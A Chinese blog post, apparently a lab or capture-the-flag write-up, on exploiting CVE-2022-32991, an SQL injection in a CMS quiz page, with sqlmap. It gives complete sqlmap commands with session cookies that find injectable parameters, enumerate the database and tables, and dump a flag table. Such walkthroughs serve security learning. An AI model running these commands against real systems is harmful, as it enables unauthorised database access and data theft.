前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2022-32991

CVE-2022-32991

作者头像
cultureSun
发布2023-05-18 14:44:22
5430
发布2023-05-18 14:44:22
举报
文章被收录于专栏:cultureSun学安全

简介

这是一个CMS系统的漏洞,存在SQL注入漏洞。 本人是用春秋云境搭建的漏洞环境练习。

详解

提示:welcome.php存在sql漏洞

打开网址,首页是一个登录页面。随意注册一个账号,然后登录。页面如下

16788459263952.png
16788459263952.png

此页面的地址http://eci-2ze9zit3gxb27s7e19j5.cloudeci1.ichunqiu.com/welcome.php?q=1。 怀疑参数q存在注入漏洞,使用sqlmap注入后发现不是。

尝试点击第一行的start按钮,发现页面报错且网址还是welcome.php,页面如下

16788466291945.png
16788466291945.png

此页面地址http://eci-2ze9zit3gxb27s7e19j5.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34

这个页面GET参数比较多极有可能存在漏洞,使用sqlmap扫描

注意加上cookie

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10"

提示eid参数和n参数存在注入漏洞。继续扫描当前数据库

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" --current-db

扫描到当前数据库为----ctf ,继续扫描库中的数据表

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" -D "ctf" --tables

数据表一共9个,发现有一张表名flag表,表中应该存着要找的flag,获取flag表数据

sqlmap --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1678841342; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1678842366; PHPSESSID=16864uie1cit4mf0v6pv5htfto" -u "http://eci-2ze9879e96d0q7yz98bn.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=10&t=10" -D "ctf" -T "flag" --dump

成功找到flag----flag{555f3edc-fdc3-4548-ae99-ff3d91107137}

结语

使用sqlmap是比较快,但是有时间建议手工注入,能力提升的页比较快。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介
  • 详解
  • 结语
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档